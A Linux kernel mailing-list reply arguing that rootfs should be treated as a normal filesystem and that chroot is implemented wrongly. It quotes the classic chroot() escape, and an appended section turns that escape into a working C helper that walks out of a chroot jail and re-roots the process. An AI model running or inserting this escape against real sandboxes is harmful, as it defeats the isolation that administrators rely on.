On 10/08/14 14:23, Eric W. Biederman wrote:
>> Could we have an extra rootfs-like fs that is always completely empty,
>> doesn't allow any writes, and can sit at the bottom of container
>> namespace hierarchies? If so, and if we add a new syscall that's like
>> pivot_root (or unshare) but prunes the hierarchy, then we could switch
>> to that rootfs then.
>
> Or equally have something that guarantees that rootfs is empty and
> read-only at the time the normal root filesystem is mounted. That is
> certainly a much more localized change if we want to go there.

What do you mean "normal" root filesystem? It is entirely possible (and
in fact common in the embedded world) to run from rootfs. I pushed my
old inittmpfs patches (at the request of Cray) last year because being
able to take down the system with "cat /dev/zero > /blah" (as rootfs
allows and tmpfs doesn't) is a bad thing.

Rootfs is about as special as PID 1 is. We don't filter out PID 1 from
"ps" to avoid confusing people, but for some reason whoever did
/proc/$PID/mountinfo decided that rootfs shouldn't show up because magic
magic specialness.

We show /run, which is a tmpfs instance. If I mount two different
filesystems on top of each other on /mnt, it shows both. (Overmounts
were not invented by rootfs.) But no, mountinfo filters out rootfs
because magic magic specialness.

It makes me sad that this kind of special-case thinking is allowed in
the kernel.

> I am half tempted to suggest that mount --move /some/path / be updated
> to make the old / just go away (perhaps to be replaced with a read-only
> empty rootfs). That gets us into figuring out if we break userspace
> which is a big challenge.

My concern was that chroot() moving a magic "/" pointer that you can
trivially escape from with

  x=open("."); chroot("sub"); fchdir(x);
  chdir("../../../../../../../../..");

is having extra code in the kernel to do it _wrong_. We have
per-process namespaces now.
We can actually adjust the mount tree (inserting a new bind mount if the
directory we're changing to is not already a mount point).

If a per-process namespace needs to be anchored by a tmpfs, fine. But
requiring that to be the SAME instance globally for the entire system is
not what containers are _about_. It's not true for PID 1 and it
shouldn't be true for rootfs.

By all means, if a filesystem is no longer accessible in a namespace,
decrement its reference count. (Keeping in mind that a bind mount should
count as a reference, and rootfs should always have a nonzero reference
count.) But "/" is not special in this regard. If you want to make all
overmounts vanish (which seems like a really bad idea and breaks 40
years of Unix semantics), argue for that.

Please stop treating rootfs like it isn't potentially usable as a
full-fledged filesystem. (Pet peeve of mine.)

> Eric

Rob
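
For readers who have not seen the chroot() escape mentioned above spelled out, here is a minimal C sketch of it. The helper name `escape_chroot`, the 64-level loop bound, and the final `chroot(".")` are assumptions added for illustration and are not from the message. It also assumes the caller has CAP_SYS_CHROOT (typically root) and that the current directory lies outside `subdir`.

```c
#define _DEFAULT_SOURCE   /* exposes chroot() and fchdir() on glibc */
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * Hypothetical helper, not part of the original message.
 * Returns 0 on success, -1 on failure with errno set.
 */
int escape_chroot(const char *subdir)
{
    int saved, i;
    int fd = open(".", O_RDONLY);   /* keep a handle on the current directory */

    if (fd < 0)
        return -1;

    /* Move the root to subdir, then step back to the saved directory. */
    if (chroot(subdir) < 0 || fchdir(fd) < 0) {
        saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    close(fd);

    /* cwd is now outside the new root, so ".." is not clamped at it. */
    for (i = 0; i < 64; i++)
        if (chdir("..") < 0)
            return -1;

    /* Assumed extra step: re-anchor "/" at wherever the walk ended. */
    return chroot(".");
}
```

Without the needed capability, the chroot() call fails with EPERM and the helper returns -1, so the sketch only demonstrates the escape for a privileged process.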